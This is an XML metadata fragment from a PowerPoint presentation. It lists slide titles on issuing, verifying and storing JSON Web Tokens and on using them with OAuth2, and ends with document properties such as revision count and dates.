      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>Issuing JWTs</vt:lpstr>
      <vt:lpstr>Verifying JWTs</vt:lpstr>
      <vt:lpstr>Storing JWTs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JWT + OAuth2</vt:lpstr>
      <vt:lpstr>JWT + OAuth2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Access &amp; Refresh Tokens</vt:lpstr>
      <vt:lpstr>Examples </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Angular App w/ Login Form</vt:lpstr>
      <vt:lpstr>Login makes POST to /login</vt:lpstr>
      <vt:lpstr>Server Response</vt:lpstr>
      <vt:lpstr>Subsequent Requests</vt:lpstr>
      <vt:lpstr>Server Request Handler – Auth Logic</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Use Stormpath for API Authentication &amp; Security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Robert Damphousse</cp:lastModifiedBy>
  <cp:revision>779</cp:revision>
  <cp:lastPrinted>2010-09-16T15:59:12Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-08-27T22:29:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-16T19:06:18Z</dcterms:modified>
</cp:coreProperties>
</file>